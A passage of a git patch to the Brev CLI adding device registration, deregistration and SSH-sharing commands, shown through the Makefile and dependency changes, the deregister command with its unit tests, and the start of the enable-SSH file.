From 8f67b8c60b2030fa0ca2c2ae27617a101f1394e8 Mon Sep 17 00:00:00 2001 From: Pratik Patel Date: Mon, 2 Mar 2026 16:06:03 -0800 Subject: [PATCH 1/4] feat(BRE2-736): registration of user owned linux device to Brev. Beginning of SSH sharing. --- .gitignore | 1 + Makefile | 9 +- go.mod | 8 +- go.sum | 16 +- pkg/cmd/cmd.go | 8 +- pkg/cmd/deregister/deregister.go | 198 +++++++++ pkg/cmd/deregister/deregister_test.go | 414 +++++++++++++++++++ pkg/cmd/enablessh/enablessh.go | 236 +++++++++++ pkg/cmd/enablessh/enablessh_test.go | 240 +++++++++++ pkg/cmd/grantssh/grantssh.go | 255 ++++++++++++ pkg/cmd/grantssh/grantssh_test.go | 365 +++++++++++++++++ pkg/cmd/ls/ls.go | 144 ++++++- pkg/cmd/register/hardware.go | 306 ++++++++++++++ pkg/cmd/register/hardware_test.go | 425 ++++++++++++++++++++ pkg/cmd/register/netbird.go | 72 ++++ pkg/cmd/register/providers.go | 50 +++ pkg/cmd/register/register.go | 311 +++++++++++++- pkg/cmd/register/register_test.go | 359 +++++++++++++++++ pkg/cmd/register/registration_store.go | 92 +++++ pkg/cmd/register/registration_store_test.go | 158 ++++++++ pkg/cmd/register/rpcclient.go | 99 +++++ pkg/cmd/register/rpcclient_test.go | 274 +++++++++++++ pkg/entity/entity.go | 11 + pkg/store/http.go | 9 + pkg/store/organization.go | 16 + pkg/store/user.go | 16 + 26 files changed, 4062 insertions(+), 30 deletions(-) create mode 100644 pkg/cmd/deregister/deregister.go create mode 100644 pkg/cmd/deregister/deregister_test.go create mode 100644 pkg/cmd/enablessh/enablessh.go create mode 100644 pkg/cmd/enablessh/enablessh_test.go create mode 100644 pkg/cmd/grantssh/grantssh.go create mode 100644 pkg/cmd/grantssh/grantssh_test.go create mode 100644 pkg/cmd/register/hardware.go create mode 100644 pkg/cmd/register/hardware_test.go create mode 100644 pkg/cmd/register/netbird.go create mode 100644 pkg/cmd/register/providers.go create mode 100644 pkg/cmd/register/register_test.go create mode 100644 pkg/cmd/register/registration_store.go create mode 100644 pkg/cmd/register/registration_store_test.go create mode 100644 pkg/cmd/register/rpcclient.go create mode 100644 pkg/cmd/register/rpcclient_test.go diff --git a/.gitignore b/.gitignore index 8f1541e0e..1276cd3d7 100644 --- a/.gitignore +++ b/.gitignore @@ -46,6 +46,7 @@ dist/ # binary brev-cli brev +brev-local # golang executable go1.* diff --git a/Makefile b/Makefile index f459f6715..b072f0535 100644 --- a/Makefile +++ b/Makefile @@ -8,24 +8,25 @@ fast-build: ## go build -o brev CGO_ENABLED=0 go build -o brev -ldflags "-X github.com/brevdev/brev-cli/pkg/cmd/version.Version=${VERSION}" .PHONY: local -local: ## build with env wrapper (use: make local env=dev0|dev1|dev2|stg, or make local for defaults) +local: ## build with env wrapper (use: make local env=dev0|dev1|dev2|stg arch=linux/amd64, or make local for defaults) $(call print-target) ifdef env @echo "Building with env=$(env) wrapper..." @echo ${VERSION} - CGO_ENABLED=0 go build -o brev -ldflags "-X github.com/brevdev/brev-cli/pkg/cmd/version.Version=${VERSION}" + $(if $(arch),GOOS=$(word 1,$(subst /, ,$(arch))) GOARCH=$(word 2,$(subst /, ,$(arch))),) CGO_ENABLED=0 go build -o brev-local -ldflags "-X github.com/brevdev/brev-cli/pkg/cmd/version.Version=${VERSION}" @echo '#!/bin/sh' > brev @echo '# Auto-generated wrapper with environment overrides' >> brev @echo 'export BREV_CONSOLE_URL="https://localhost.nvidia.com:3000"' >> brev @echo 'export BREV_AUTH_URL="https://api.stg.ngc.nvidia.com"' >> brev @echo 'export BREV_AUTH_ISSUER_URL="https://stg.login.nvidia.com"' >> brev @echo 'export BREV_API_URL="https://bd.$(env).brev.nvidia.com"' >> brev + @echo 'export BREV_PUBLIC_API_URL="https://api.$(env).brev.nvidia.com"' >> brev @echo 'export BREV_GRPC_URL="api.$(env).brev.nvidia.com:443"' >> brev - @echo 'exec "$$(cd "$$(dirname "$$0")" && pwd)/brev" "$$@"' >> brev + @echo 'exec "$$(cd "$$(dirname "$$0")" && pwd)/brev-local" "$$@"' >> brev @chmod +x brev else @echo "Building without environment overrides (using config.go defaults)..." - $(MAKE) fast-build + $(if $(arch),GOOS=$(word 1,$(subst /, ,$(arch))) GOARCH=$(word 2,$(subst /, ,$(arch))),) CGO_ENABLED=0 go build -o brev -ldflags "-X github.com/brevdev/brev-cli/pkg/cmd/version.Version=${VERSION}" endif .PHONY: install-dev diff --git a/go.mod b/go.mod index 8d197bd70..982f8daf8 100644 --- a/go.mod +++ b/go.mod @@ -3,6 +3,9 @@ module github.com/brevdev/brev-cli go 1.24.0 require ( + buf.build/gen/go/brevdev/devplane/connectrpc/go v1.19.1-20260228021043-887d38e1b474.2 + buf.build/gen/go/brevdev/devplane/protocolbuffers/go v1.36.11-20260228021043-887d38e1b474.1 + connectrpc.com/connect v1.19.1 github.com/alessio/shellescape v1.4.1 github.com/brevdev/parse v0.0.11 github.com/briandowns/spinner v1.16.0 @@ -12,7 +15,7 @@ require ( github.com/go-git/go-git/v5 v5.13.2 github.com/go-resty/resty/v2 v2.17.0 github.com/golang-jwt/jwt/v5 v5.3.0 - github.com/google/go-cmp v0.6.0 + github.com/google/go-cmp v0.7.0 github.com/google/huproxy v0.0.0-20210816191033-a131ee126ce3 github.com/google/uuid v1.6.0 github.com/gorilla/websocket v1.5.0 @@ -45,6 +48,7 @@ require ( ) require ( + buf.build/gen/go/brevdev/protoc-gen-gotag/protocolbuffers/go v1.36.11-20220906235457-8b4922735da5.1 // indirect dario.cat/mergo v1.0.0 // indirect github.com/Azure/go-ansiterm v0.0.0-20210617225240-d185dfc1b5a1 // indirect github.com/Microsoft/go-winio v0.6.1 // indirect @@ -148,7 +152,7 @@ require ( golang.org/x/sys v0.40.0 // indirect golang.org/x/term v0.39.0 // indirect golang.org/x/time v0.12.0 // indirect - google.golang.org/protobuf v1.34.2 + google.golang.org/protobuf v1.36.11 gopkg.in/inf.v0 v0.9.1 // indirect gopkg.in/yaml.v2 v2.4.0 // indirect gopkg.in/yaml.v3 v3.0.1 // indirect diff --git a/go.sum b/go.sum index d450015e8..78a1436c8 100644 --- a/go.sum +++ b/go.sum @@ -1,3 +1,9 @@ +buf.build/gen/go/brevdev/devplane/connectrpc/go v1.19.1-20260228021043-887d38e1b474.2 h1:Sq0kIa/xKzScbJcqB5EbPVhOL0QYHPr3araQaupL2lk= +buf.build/gen/go/brevdev/devplane/connectrpc/go v1.19.1-20260228021043-887d38e1b474.2/go.mod h1:Yh34p9aADmWsKv2umYlMpnCZuBmNBE9N+HImgRriJXM= +buf.build/gen/go/brevdev/devplane/protocolbuffers/go v1.36.11-20260228021043-887d38e1b474.1 h1:WlSch6mGiV/gO+vq6y0Ut+HO2ffFHsLhTI3lVWdO0bI= +buf.build/gen/go/brevdev/devplane/protocolbuffers/go v1.36.11-20260228021043-887d38e1b474.1/go.mod h1:V/y7Wxg0QvU4XPVwqErF5NHLobUT1QEyfgrGuQIxdPo= +buf.build/gen/go/brevdev/protoc-gen-gotag/protocolbuffers/go v1.36.11-20220906235457-8b4922735da5.1 h1:6amhprQmCKJ4wgJ6ngkh32d9V+dQcOLUZ/SfHdOnYgo= +buf.build/gen/go/brevdev/protoc-gen-gotag/protocolbuffers/go v1.36.11-20220906235457-8b4922735da5.1/go.mod h1:O+pnSHMru/naTMrm4tmpBoH3wz6PHa+R75HR7Mv8X2g= cloud.google.com/go v0.26.0/go.mod h1:aQUYkXzVsufM+DwF1aE+0xfcU+56JwCaLick0ClmMTw= cloud.google.com/go v0.34.0/go.mod h1:aQUYkXzVsufM+DwF1aE+0xfcU+56JwCaLick0ClmMTw= cloud.google.com/go v0.38.0/go.mod h1:990N+gfupTy94rShfmMCWGDn0LpTmnzTp2qbd1dvSRU= @@ -35,6 +41,8 @@ cloud.google.com/go/storage v1.6.0/go.mod h1:N7U0C8pVQ/+NIKOBQyamJIeKQKkZ+mxpohl cloud.google.com/go/storage v1.8.0/go.mod h1:Wv1Oy7z6Yz3DshWRJFhqM/UCfaWIRTdp0RXyy7KQOVs= cloud.google.com/go/storage v1.10.0/go.mod h1:FLPqc6j+Ki4BU591ie1oL6qBQGu2Bl/tZ9ullr3+Kg0= cloud.google.com/go/storage v1.14.0/go.mod h1:GrKmX003DSIwi9o29oFT7YDnHYwZoctc3fOKtUw0Xmo= +connectrpc.com/connect v1.19.1 h1:R5M57z05+90EfEvCY1b7hBxDVOUl45PrtXtAV2fOC14= +connectrpc.com/connect v1.19.1/go.mod h1:tN20fjdGlewnSFeZxLKb0xwIZ6ozc3OQs2hTXy4du9w= dario.cat/mergo v1.0.0 h1:AGCNq9Evsj31mOgNPcLyXc+4PNABt905YmuqPYYpBWk= dario.cat/mergo v1.0.0/go.mod h1:uNxQE+84aUszobStD9th8a29P2fMDhsBdgRYvZOxGmk= dmitri.shuralyov.com/gpu/mtl v0.0.0-20190408044501-666a987793e9/go.mod h1:H6x//7gZCb22OMCxBHrMx7a5I7Hp++hsVxbQ4BYO7hU= @@ -208,8 +216,8 @@ github.com/google/go-cmp v0.5.1/go.mod h1:v8dTdLbMG2kIc/vJvl+f65V22dbkXbowE6jgT/ github.com/google/go-cmp v0.5.2/go.mod h1:v8dTdLbMG2kIc/vJvl+f65V22dbkXbowE6jgT/gNBxE= github.com/google/go-cmp v0.5.4/go.mod h1:v8dTdLbMG2kIc/vJvl+f65V22dbkXbowE6jgT/gNBxE= github.com/google/go-cmp v0.5.9/go.mod h1:17dUlkBOakJ0+DkrSSNjCkIjxS6bF9zb3elmeNGIjoY= -github.com/google/go-cmp v0.6.0 h1:ofyhxvXcZhMsU5ulbFiLKl/XBFqE1GSq7atu8tAmTRI= -github.com/google/go-cmp v0.6.0/go.mod h1:17dUlkBOakJ0+DkrSSNjCkIjxS6bF9zb3elmeNGIjoY= +github.com/google/go-cmp v0.7.0 h1:wk8382ETsv4JYUZwIsn6YpYiWiBsYLSJiTsyBybVuN8= +github.com/google/go-cmp v0.7.0/go.mod h1:pXiqmnSA92OHEEa9HXL2W4E7lf9JzCmGVUdgjX3N/iU= github.com/google/gofuzz v1.0.0/go.mod h1:dBl0BpW6vV/+mYPU4Po3pmUjxk6FQPldtuIdl/M65Eg= github.com/google/gofuzz v1.2.0 h1:xRy4A+RhZaiKjJ1bPfwQ8sedCA+YS2YcCHW6ec7JMi0= github.com/google/gofuzz v1.2.0/go.mod h1:dBl0BpW6vV/+mYPU4Po3pmUjxk6FQPldtuIdl/M65Eg= @@ -776,8 +784,8 @@ google.golang.org/protobuf v1.23.0/go.mod h1:EGpADcykh3NcUnDUJcl1+ZksZNG86OlYog2 google.golang.org/protobuf v1.23.1-0.20200526195155-81db48ad09cc/go.mod h1:EGpADcykh3NcUnDUJcl1+ZksZNG86OlYog2l/sGQquU= google.golang.org/protobuf v1.24.0/go.mod h1:r/3tXBNzIEhYS9I1OUVjXDlt8tc493IdKGjtUeSXeh4= google.golang.org/protobuf v1.25.0/go.mod h1:9JNX74DMeImyA3h4bdi1ymwjUzf21/xIlbajtzgsN7c= -google.golang.org/protobuf v1.34.2 h1:6xV6lTsCfpGD21XK49h7MhtcApnLqkfYgPcdHftf6hg= -google.golang.org/protobuf v1.34.2/go.mod h1:qYOHts0dSfpeUzUFpOMr/WGzszTmLH+DiWniOlNbLDw= +google.golang.org/protobuf v1.36.11 h1:fV6ZwhNocDyBLK0dj+fg8ektcVegBBuEolpbTQyBNVE= +google.golang.org/protobuf v1.36.11/go.mod h1:HTf+CrKn2C3g5S8VImy6tdcUvCska2kB7j23XfzDpco= gopkg.in/check.v1 v0.0.0-20161208181325-20d25e280405/go.mod h1:Co6ibVJAznAaIkqp8huTwlJQCZ016jof/cbN4VW5Yz0= gopkg.in/check.v1 v1.0.0-20180628173108-788fd7840127/go.mod h1:Co6ibVJAznAaIkqp8huTwlJQCZ016jof/cbN4VW5Yz0= gopkg.in/check.v1 v1.0.0-20190902080502-41f04d3bba15/go.mod h1:Co6ibVJAznAaIkqp8huTwlJQCZ016jof/cbN4VW5Yz0= diff --git a/pkg/cmd/cmd.go b/pkg/cmd/cmd.go index 8521ff268..07768d68b 100644 --- a/pkg/cmd/cmd.go +++ b/pkg/cmd/cmd.go @@ -13,11 +13,14 @@ import ( "github.com/brevdev/brev-cli/pkg/cmd/connect" "github.com/brevdev/brev-cli/pkg/cmd/copy" "github.com/brevdev/brev-cli/pkg/cmd/delete" + "github.com/brevdev/brev-cli/pkg/cmd/deregister" + "github.com/brevdev/brev-cli/pkg/cmd/enablessh" "github.com/brevdev/brev-cli/pkg/cmd/envvars" "github.com/brevdev/brev-cli/pkg/cmd/exec" "github.com/brevdev/brev-cli/pkg/cmd/fu" "github.com/brevdev/brev-cli/pkg/cmd/gpucreate" "github.com/brevdev/brev-cli/pkg/cmd/gpusearch" + "github.com/brevdev/brev-cli/pkg/cmd/grantssh" "github.com/brevdev/brev-cli/pkg/cmd/healthcheck" "github.com/brevdev/brev-cli/pkg/cmd/hello" "github.com/brevdev/brev-cli/pkg/cmd/importideconfig" @@ -305,7 +308,10 @@ func createCmdTree(cmd *cobra.Command, t *terminal.Terminal, loginCmdStore *stor cmd.AddCommand(reset.NewCmdReset(t, loginCmdStore, noLoginCmdStore)) cmd.AddCommand(profile.NewCmdProfile(t, loginCmdStore, noLoginCmdStore)) cmd.AddCommand(refresh.NewCmdRefresh(t, loginCmdStore)) - cmd.AddCommand(register.NewCmdRegister(t)) + cmd.AddCommand(register.NewCmdRegister(t, loginCmdStore)) + cmd.AddCommand(deregister.NewCmdDeregister(t, loginCmdStore)) + cmd.AddCommand(enablessh.NewCmdEnableSSH(t, loginCmdStore)) + cmd.AddCommand(grantssh.NewCmdGrantSSH(t, loginCmdStore)) cmd.AddCommand(runtasks.NewCmdRunTasks(t, noLoginCmdStore)) cmd.AddCommand(proxy.NewCmdProxy(t, noLoginCmdStore)) cmd.AddCommand(healthcheck.NewCmdHealthcheck(t, noLoginCmdStore)) diff --git a/pkg/cmd/deregister/deregister.go b/pkg/cmd/deregister/deregister.go new file mode 100644 index 000000000..eea35e002 --- /dev/null +++ b/pkg/cmd/deregister/deregister.go @@ -0,0 +1,198 @@ +// Package deregister provides the brev deregister command for device deregistration +package deregister + +import ( + "context" + "fmt" + "os/user" + + nodev1connect "buf.build/gen/go/brevdev/devplane/connectrpc/go/devplaneapi/v1/devplaneapiv1connect" + nodev1 "buf.build/gen/go/brevdev/devplane/protocolbuffers/go/devplaneapi/v1" + "connectrpc.com/connect" + + "github.com/brevdev/brev-cli/pkg/cmd/enablessh" + "github.com/brevdev/brev-cli/pkg/cmd/register" + "github.com/brevdev/brev-cli/pkg/config" + "github.com/brevdev/brev-cli/pkg/entity" + breverrors "github.com/brevdev/brev-cli/pkg/errors" + "github.com/brevdev/brev-cli/pkg/terminal" + + "github.com/spf13/cobra" +) + +// DeregisterStore defines the store methods needed by the deregister command. +type DeregisterStore interface { + GetCurrentUser() (*entity.User, error) + GetBrevHomePath() (string, error) + GetAccessToken() (string, error) +} + +// PlatformChecker checks whether the current platform is supported. +type PlatformChecker interface { + IsCompatible() bool +} + +// Selector prompts the user to choose from a list of items. +type Selector interface { + Select(label string, items []string) string +} + +// NetBirdUninstaller uninstalls the NetBird network agent. +type NetBirdUninstaller interface { + Uninstall() error +} + +// NodeClientFactory creates ConnectRPC ExternalNodeService clients. +type NodeClientFactory interface { + NewNodeClient(provider register.TokenProvider, baseURL string) nodev1connect.ExternalNodeServiceClient +} + +// SSHKeyRemover removes Brev-managed SSH keys. +type SSHKeyRemover interface { + RemoveBrevKeys(u *user.User) error +} + +// brevSSHKeyRemover delegates to enablessh.RemoveBrevAuthorizedKeys. +type brevSSHKeyRemover struct{} + +func (brevSSHKeyRemover) RemoveBrevKeys(u *user.User) error { + if err := enablessh.RemoveBrevAuthorizedKeys(u); err != nil { + return fmt.Errorf("removing brev authorized keys: %w", err) + } + return nil +} + +// deregisterDeps bundles the side-effecting dependencies of runDeregister so +// they can be replaced in tests. +type deregisterDeps struct { + platform PlatformChecker + prompter Selector + netbird NetBirdUninstaller + nodeClients NodeClientFactory + registrationStore register.RegistrationStore + sshKeys SSHKeyRemover +} + +func defaultDeregisterDeps(brevHome string) deregisterDeps { + return deregisterDeps{ + platform: register.LinuxPlatform{}, + prompter: register.TerminalPrompter{}, + netbird: register.NetBirdManager{}, + nodeClients: register.DefaultNodeClientFactory{}, + registrationStore: register.NewFileRegistrationStore(brevHome), + sshKeys: brevSSHKeyRemover{}, + } +} + +var ( + deregisterLong = `Deregister your device from NVIDIA Brev + +This command removes the local registration data and optionally uninstalls +NetBird (network agent).` + + deregisterExample = ` brev deregister` +) + +func NewCmdDeregister(t *terminal.Terminal, store DeregisterStore) *cobra.Command { + cmd := &cobra.Command{ + Annotations: map[string]string{"configuration": ""}, + Use: "deregister", + DisableFlagsInUseLine: true, + Short: "Deregister your device from Brev", + Long: deregisterLong, + Example: deregisterExample, + RunE: func(cmd *cobra.Command, args []string) error { + brevHome, err := store.GetBrevHomePath() + if err != nil { + return breverrors.WrapAndTrace(err) + } + return runDeregister(cmd.Context(), t, store, defaultDeregisterDeps(brevHome)) + }, + } + + return cmd +} + +func runDeregister(ctx context.Context, t *terminal.Terminal, s DeregisterStore, deps deregisterDeps) error { //nolint:funlen // deregistration flow + if !deps.platform.IsCompatible() { + return fmt.Errorf("brev deregister is only supported on Linux") + } + + registered, err := deps.registrationStore.Exists() + if err != nil { + return breverrors.WrapAndTrace(err) + } + if !registered { + return fmt.Errorf("no registration found; this machine does not appear to be registered\nRun 'brev register' to register your device") + } + + reg, err := deps.registrationStore.Load() + if err != nil { + return fmt.Errorf("failed to read registration file: %w", err) + } + + t.Vprint("") + t.Vprint(t.Green("Deregistering device")) + t.Vprint("") + t.Vprintf(" Node ID: %s\n", reg.ExternalNodeID) + t.Vprintf(" Name: %s\n", reg.DisplayName) + t.Vprint("") + + confirm := deps.prompter.Select( + "Proceed with deregistration?", + []string{"Yes, proceed", "No, cancel"}, + ) + if confirm != "Yes, proceed" { + t.Vprint("Deregistration canceled.") + return nil + } + + t.Vprint("") + t.Vprint(t.Yellow("Removing node from Brev...")) + client := deps.nodeClients.NewNodeClient(s, config.GlobalConfig.GetBrevPublicAPIURL()) + if _, err := client.RemoveNode(ctx, connect.NewRequest(&nodev1.RemoveNodeRequest{ + ExternalNodeId: reg.ExternalNodeID, + })); err != nil { + return fmt.Errorf("failed to deregister node: %w", err) + } + t.Vprint(t.Green(" Node removed from Brev.")) + t.Vprint("") + + // Remove Brev SSH keys from authorized_keys. + u, err := user.Current() + if err != nil { + t.Vprintf(" Warning: could not determine current user for SSH key cleanup: %v\n", err) + } else { + if err := deps.sshKeys.RemoveBrevKeys(u); err != nil { + t.Vprintf(" Warning: failed to remove Brev SSH keys: %v\n", err) + } else { + t.Vprint(t.Green(" Brev SSH keys removed from authorized_keys.")) + } + } + t.Vprint("") + + removeNetbird := deps.prompter.Select( + "Would you also like to uninstall NetBird?", + []string{"Yes, uninstall NetBird", "No, keep NetBird installed"}, + ) + if removeNetbird == "Yes, uninstall NetBird" { + t.Vprint("Removing NetBird...") + if err := deps.netbird.Uninstall(); err != nil { + t.Vprintf(" Warning: failed to uninstall NetBird: %v\n", err) + } else { + t.Vprint(t.Green(" NetBird uninstalled.")) + } + t.Vprint("") + } + + t.Vprint("Removing registration data...") + if err := deps.registrationStore.Delete(); err != nil { + t.Vprintf(" Warning: failed to remove local registration file: %v\n", err) + t.Vprint(" You can manually remove it with: rm ~/.brev/device_registration.json") + } + + t.Vprint(t.Green("Deregistration complete.")) + t.Vprint("") + + return nil +} diff --git a/pkg/cmd/deregister/deregister_test.go b/pkg/cmd/deregister/deregister_test.go new file mode 100644 index 000000000..5e7ccec59 --- /dev/null +++ b/pkg/cmd/deregister/deregister_test.go @@ -0,0 +1,414 @@ +package deregister + +import ( + "context" + "fmt" + "net/http/httptest" + "os/user" + "testing" + + nodev1connect "buf.build/gen/go/brevdev/devplane/connectrpc/go/devplaneapi/v1/devplaneapiv1connect" + nodev1 "buf.build/gen/go/brevdev/devplane/protocolbuffers/go/devplaneapi/v1" + "connectrpc.com/connect" + + "github.com/brevdev/brev-cli/pkg/cmd/register" + "github.com/brevdev/brev-cli/pkg/entity" + "github.com/brevdev/brev-cli/pkg/terminal" +) + +type mockDeregisterStore struct { + user *entity.User + home string + token string + err error +} + +func (m *mockDeregisterStore) GetCurrentUser() (*entity.User, error) { + if m.err != nil { + return nil, m.err + } + return m.user, nil +} + +func (m *mockDeregisterStore) GetBrevHomePath() (string, error) { return m.home, nil } +func (m *mockDeregisterStore) GetAccessToken() (string, error) { return m.token, nil } + +// fakeNodeService implements the server side of ExternalNodeService for testing. +type fakeNodeService struct { + nodev1connect.UnimplementedExternalNodeServiceHandler + removeNodeFn func(*nodev1.RemoveNodeRequest) (*nodev1.RemoveNodeResponse, error) +} + +func (f *fakeNodeService) RemoveNode(_ context.Context, req *connect.Request[nodev1.RemoveNodeRequest]) (*connect.Response[nodev1.RemoveNodeResponse], error) { + resp, err := f.removeNodeFn(req.Msg) + if err != nil { + return nil, err + } + return connect.NewResponse(resp), nil +} + +// mockRegistrationStore satisfies register.RegistrationStore for deregister tests. +type mockRegistrationStore struct { + reg *register.DeviceRegistration +} + +func (m *mockRegistrationStore) Save(reg *register.DeviceRegistration) error { + m.reg = reg + return nil +} + +func (m *mockRegistrationStore) Load() (*register.DeviceRegistration, error) { + if m.reg == nil { + return nil, fmt.Errorf("no registration") + } + return m.reg, nil +} + +func (m *mockRegistrationStore) Delete() error { + m.reg = nil + return nil +} + +func (m *mockRegistrationStore) Exists() (bool, error) { + return m.reg != nil, nil +} + +// mock types for deregisterDeps interfaces + +type mockPlatform struct{ compatible bool } + +func (m mockPlatform) IsCompatible() bool { return m.compatible } + +type mockSelector struct { + fn func(label string, items []string) string +} + +func (m mockSelector) Select(label string, items []string) string { + return m.fn(label, items) +} + +type mockNetBirdUninstaller struct { + called bool + err error +} + +func (m *mockNetBirdUninstaller) Uninstall() error { + m.called = true + return m.err +} + +type mockNodeClientFactory struct { + serverURL string +} + +func (m mockNodeClientFactory) NewNodeClient(provider register.TokenProvider, _ string) nodev1connect.ExternalNodeServiceClient { + return register.NewNodeServiceClient(provider, m.serverURL) +} + +type mockSSHKeyRemover struct { + called bool + err error +} + +func (m *mockSSHKeyRemover) RemoveBrevKeys(_ *user.User) error { + m.called = true + return m.err +} + +// testDeregisterDeps returns deps with all side-effects stubbed. The +// prompter defaults to confirming all prompts. +func testDeregisterDeps(t *testing.T, svc *fakeNodeService, regStore register.RegistrationStore) (deregisterDeps, *httptest.Server) { + t.Helper() + + _, handler := nodev1connect.NewExternalNodeServiceHandler(svc) + server := httptest.NewServer(handler) + + return deregisterDeps{ + platform: mockPlatform{compatible: true}, + prompter: mockSelector{fn: func(_ string, items []string) string { + // Default: pick first item (Yes, ...) + if len(items) > 0 { + return items[0] + } + return "" + }}, + netbird: &mockNetBirdUninstaller{}, + nodeClients: mockNodeClientFactory{serverURL: server.URL}, + registrationStore: regStore, + sshKeys: &mockSSHKeyRemover{}, + }, server +} + +func Test_runDeregister_HappyPath(t *testing.T) { + regStore := &mockRegistrationStore{ + reg: ®ister.DeviceRegistration{ + ExternalNodeID: "unode_abc", + DisplayName: "My Spark", + OrgID: "org_123", + DeviceID: "dev-uuid", + }, + } + + store := &mockDeregisterStore{ + user: &entity.User{ID: "user_1"}, + home: "/home/testuser/.brev", + token: "tok", + } + + var gotNodeID string + svc := &fakeNodeService{ + removeNodeFn: func(req *nodev1.RemoveNodeRequest) (*nodev1.RemoveNodeResponse, error) { + gotNodeID = req.GetExternalNodeId() + return &nodev1.RemoveNodeResponse{}, nil + }, + } + + deps, server := testDeregisterDeps(t, svc, regStore) + defer server.Close() + + term := terminal.New() + err := runDeregister(context.Background(), term, store, deps) + if err != nil { + t.Fatalf("runDeregister failed: %v", err) + } + + if gotNodeID != "unode_abc" { + t.Errorf("expected node ID unode_abc, got %s", gotNodeID) + } + + // Registration should be deleted + exists, err := regStore.Exists() + if err != nil { + t.Fatalf("Exists error: %v", err) + } + if exists { + t.Error("expected registration to be deleted after deregister") + } +} + +func Test_runDeregister_UserCancels(t *testing.T) { + regStore := &mockRegistrationStore{ + reg: ®ister.DeviceRegistration{ + ExternalNodeID: "unode_abc", + DisplayName: "My Spark", + OrgID: "org_123", + }, + } + + store := &mockDeregisterStore{ + user: &entity.User{ID: "user_1"}, + home: "/home/testuser/.brev", + token: "tok", + } + + svc := &fakeNodeService{} + deps, server := testDeregisterDeps(t, svc, regStore) + defer server.Close() + + callCount := 0 + deps.prompter = mockSelector{fn: func(_ string, _ []string) string { + callCount++ + if callCount == 2 { + // Second prompt is the confirmation — cancel it + return "No, cancel" + } + return "No, keep NetBird installed" + }} + + term := terminal.New() + err := runDeregister(context.Background(), term, store, deps) + if err != nil { + t.Fatalf("expected nil error on cancel, got: %v", err) + } + + // Registration should still exist + exists, err := regStore.Exists() + if err != nil { + t.Fatalf("Exists error: %v", err) + } + if !exists { + t.Error("registration should still exist after cancel") + } +} + +func Test_runDeregister_NotRegistered(t *testing.T) { + regStore := &mockRegistrationStore{} + + store := &mockDeregisterStore{ + user: &entity.User{ID: "user_1"}, + home: "/home/testuser/.brev", + token: "tok", + } + + svc := &fakeNodeService{} + deps, server := testDeregisterDeps(t, svc, regStore) + defer server.Close() + + term := terminal.New() + err := runDeregister(context.Background(), term, store, deps) + if err == nil { + t.Fatal("expected error when not registered") + } +} + +func Test_runDeregister_RemoveNodeFails(t *testing.T) { + regStore := &mockRegistrationStore{ + reg: ®ister.DeviceRegistration{ + ExternalNodeID: "unode_abc", + DisplayName: "My Spark", + OrgID: "org_123", + }, + } + + store := &mockDeregisterStore{ + user: &entity.User{ID: "user_1"}, + home: "/home/testuser/.brev", + token: "tok", + } + + svc := &fakeNodeService{ + removeNodeFn: func(_ *nodev1.RemoveNodeRequest) (*nodev1.RemoveNodeResponse, error) { + return nil, connect.NewError(connect.CodeInternal, nil) + }, + } + + deps, server := testDeregisterDeps(t, svc, regStore) + defer server.Close() + + term := terminal.New() + err := runDeregister(context.Background(), term, store, deps) + if err == nil { + t.Fatal("expected error when RemoveNode fails") + } + + // Registration should still exist (server-side removal failed) + exists, err := regStore.Exists() + if err != nil { + t.Fatalf("Exists error: %v", err) + } + if !exists { + t.Error("registration should still exist when RemoveNode fails") + } +} + +func Test_runDeregister_SkipsNetbirdUninstall(t *testing.T) { + regStore := &mockRegistrationStore{ + reg: ®ister.DeviceRegistration{ + ExternalNodeID: "unode_abc", + DisplayName: "My Spark", + OrgID: "org_123", + }, + } + + store := &mockDeregisterStore{ + user: &entity.User{ID: "user_1"}, + home: "/home/testuser/.brev", + token: "tok", + } + + svc := &fakeNodeService{ + removeNodeFn: func(_ *nodev1.RemoveNodeRequest) (*nodev1.RemoveNodeResponse, error) { + return &nodev1.RemoveNodeResponse{}, nil + }, + } + + netbird := &mockNetBirdUninstaller{} + deps, server := testDeregisterDeps(t, svc, regStore) + defer server.Close() + + deps.prompter = mockSelector{fn: func(label string, _ []string) string { + if label == "Would you also like to uninstall NetBird?" { + return "No, keep NetBird installed" + } + return "Yes, proceed" + }} + deps.netbird = netbird + + term := terminal.New() + err := runDeregister(context.Background(), term, store, deps) + if err != nil { + t.Fatalf("runDeregister failed: %v", err) + } + + if netbird.called { + t.Error("NetBird uninstall should not be called when user declines") + } +} + +func Test_runDeregister_CallsRemoveBrevKeys(t *testing.T) { + regStore := &mockRegistrationStore{ + reg: ®ister.DeviceRegistration{ + ExternalNodeID: "unode_abc", + DisplayName: "My Spark", + OrgID: "org_123", + }, + } + + store := &mockDeregisterStore{ + user: &entity.User{ID: "user_1"}, + home: "/home/testuser/.brev", + token: "tok", + } + + svc := &fakeNodeService{ + removeNodeFn: func(_ *nodev1.RemoveNodeRequest) (*nodev1.RemoveNodeResponse, error) { + return &nodev1.RemoveNodeResponse{}, nil + }, + } + + sshKeys := &mockSSHKeyRemover{} + deps, server := testDeregisterDeps(t, svc, regStore) + defer server.Close() + deps.sshKeys = sshKeys + + term := terminal.New() + err := runDeregister(context.Background(), term, store, deps) + if err != nil { + t.Fatalf("runDeregister failed: %v", err) + } + + if !sshKeys.called { + t.Error("expected removeBrevKeys to be called during deregistration") + } +} + +func Test_runDeregister_RemoveBrevKeysFailureIsNonFatal(t *testing.T) { + regStore := &mockRegistrationStore{ + reg: ®ister.DeviceRegistration{ + ExternalNodeID: "unode_abc", + DisplayName: "My Spark", + OrgID: "org_123", + }, + } + + store := &mockDeregisterStore{ + user: &entity.User{ID: "user_1"}, + home: "/home/testuser/.brev", + token: "tok", + } + + svc := &fakeNodeService{ + removeNodeFn: func(_ *nodev1.RemoveNodeRequest) (*nodev1.RemoveNodeResponse, error) { + return &nodev1.RemoveNodeResponse{}, nil + }, + } + + deps, server := testDeregisterDeps(t, svc, regStore) + defer server.Close() + deps.sshKeys = &mockSSHKeyRemover{err: fmt.Errorf("permission denied")} + + term := terminal.New() + err := runDeregister(context.Background(), term, store, deps) + if err != nil { + t.Fatalf("expected deregister to succeed despite removeBrevKeys failure, got: %v", err) + } + + // Registration should still be cleaned up. + exists, err := regStore.Exists() + if err != nil { + t.Fatalf("Exists error: %v", err) + } + if exists { + t.Error("expected registration to be deleted even when SSH key cleanup fails") + } +} diff --git a/pkg/cmd/enablessh/enablessh.go b/pkg/cmd/enablessh/enablessh.go new file mode 100644 index 000000000..3651a9a3e --- /dev/null +++ b/pkg/cmd/enablessh/enablessh.go @@ -0,0 +1,236 @@ +// Package enablessh provides the brev enableSSH command for enabling SSH access +// to a registered external node. +package enablessh + +import 